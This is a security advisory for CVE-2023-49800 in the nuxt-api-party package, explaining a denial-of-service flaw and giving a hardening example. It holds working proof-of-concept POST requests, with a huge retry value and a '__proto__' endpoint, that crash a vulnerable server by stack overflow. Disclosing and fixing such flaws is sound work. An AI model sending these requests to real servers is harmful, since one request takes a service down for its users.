First published: Fri Dec 08 2023
### Summary

`nuxt-api-party` allows developers to proxy requests to an API without exposing credentials to the client. [`ofetch`](https://github.com/unjs/ofetch) is used to send the requests. The library lets the client send many options straight through to `ofetch`, and there is no filter on which options are accepted. The retry logic can be abused to crash the server with a stack overflow.

### Details

`fetchOptions` [are obtained directly from the request body](https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L27). These are then [passed directly into `ofetch`](https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L57C15-L57C15). An attacker supplies a URL that is guaranteed not to fetch successfully and sets the retry count to a very high value. Because `ofetch` handles errors recursively, every failed attempt adds another frame to the call stack until it overflows.

### PoC

PoC using Node:

```js
// "x:x" can never be fetched; the huge retry count drives ofetch's
// recursive error handling until the stack overflows.
await fetch("http://localhost:3000/api/__api_party/MyEndpoint", {
  method: "POST",
  body: JSON.stringify({ path: "x:x", retry: 9999999 }),
  headers: { "Content-Type": "application/json" }
})
```

`__proto__` can be used in place of the endpoint name if the real name is not known:

```js
await fetch("http://localhost:3000/api/__api_party/__proto__", {
  method: "POST",
  body: JSON.stringify({ path: "x:x", retry: 9999999 }),
  headers: { "Content-Type": "application/json" }
})
```

The stack can be grown faster by using a more complicated URI:

```js
await fetch("http://localhost:3000/api/__api_party/__proto__", {
  method: "POST",
  body: JSON.stringify({ path: "data:x;base64,----", retry: 9999999 }),
  headers: { "Content-Type": "application/json" }
})
```

### Impact

Full DoS: the server is unusable for the duration of the attack. A single request is sufficient.

### Fix

Limit which options can be passed to `ofetch`.
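The fix the advisory recommends, shown as an added example that is not nuxt-api-party's own code: the handler copies only an allowlist of client-supplied fields into the options it hands to `ofetch`, validates them, and sets `retry` server-side so the client can never choose it. The vulnerable shape is kept alongside for contrast. The allowed field names, the method list, the `MAX_RETRY` cap and the relative-path rule are assumptions for illustration, not settings taken from the project; the `resolveEndpoint` helper shows why the PoC's `__proto__` trick should fail against an own-property lookup.

```typescript
// Added example: allowlisting client-supplied fetch options before they
// reach ofetch. Not nuxt-api-party's code; names and limits are assumed.

type ClientBody = Record<string, unknown>;

// Fields a browser client may influence (assumption for this example).
const ALLOWED_KEYS = ["path", "query", "headers", "method", "body"] as const;
const ALLOWED_METHODS = new Set(["GET", "POST", "PUT", "PATCH", "DELETE"]);
// Retry budget chosen by the server, never by the client (assumption).
const MAX_RETRY = 2;

// Vulnerable shape, matching the advisory: every key in the JSON body is
// forwarded, so `retry`, `timeout`, hooks, ... are all attacker-controlled.
export function buildFetchOptionsUnsafe(body: ClientBody): ClientBody {
  return { ...body };
}

// Hardened shape: copy only allowlisted keys, validate them, pin `retry`.
export function buildFetchOptionsSafe(body: ClientBody): ClientBody {
  const out: ClientBody = {};
  for (const key of ALLOWED_KEYS) {
    if (Object.prototype.hasOwnProperty.call(body, key)) out[key] = body[key];
  }

  const path = out.path;
  if (typeof path !== "string" || path.length === 0) {
    throw new Error("path must be a non-empty string");
  }
  // Reject anything carrying a scheme ("x:x", "data:...", "https://...") or
  // a protocol-relative prefix: the proxy should only ever append a relative
  // path to the configured endpoint base (assumption).
  if (/^[a-z][a-z0-9+.-]*:/i.test(path) || path.startsWith("//")) {
    throw new Error("path must be relative to the endpoint");
  }

  if (out.method !== undefined) {
    const m = String(out.method).toUpperCase();
    if (!ALLOWED_METHODS.has(m)) throw new Error(`method not allowed: ${m}`);
    out.method = m;
  }

  // retry is always overwritten; a client value of 9999999 is discarded.
  out.retry = MAX_RETRY;
  return out;
}

// Endpoint lookup that only honours own properties, so "__proto__" or
// "constructor" in the route cannot resolve to something on Object.prototype.
export function resolveEndpoint<T>(endpoints: Record<string, T>, id: string): T {
  if (!Object.prototype.hasOwnProperty.call(endpoints, id)) {
    throw new Error(`unknown endpoint: ${id}`);
  }
  return endpoints[id];
}

// Constructed request body in the shape of the advisory's PoC.
export const POC_BODY: ClientBody = { path: "x:x", retry: 9999999 };
```

With the allowlist in place the PoC body is rejected twice over: `retry` is not an allowed key, and `x:x` is not a relative path. A legitimate body such as `{ path: "users", method: "get" }` passes through with `retry` forced to the server's cap.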
Credit: security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| Johannschopplich Nuxt Api Party | <=0.21.3 | |
| npm/nuxt-api-party | <0.22.1 | 0.22.1 |
CVE-2023-49800 is rated medium severity; its impact is denial of service (a server crash from stack overflow), not exposure of sensitive data.
To mitigate CVE-2023-49800, upgrade the nuxt-api-party package to version 0.22.1 or later.
CVE-2023-49800 affects nuxt-api-party versions before 0.22.1 (listed above as <=0.21.3).
CVE-2023-49800 does not expose credentials. The proxy handler forwards client-supplied `fetchOptions` to `ofetch` without filtering, so a client can set options such as `retry` that should only be controlled server-side.
Yes, CVE-2023-49800 is remotely exploitable: a single HTTP POST to the proxy route `/api/__api_party/<endpoint>` with an unfetchable `path` and a very large `retry` value is enough, and no misconfiguration is required.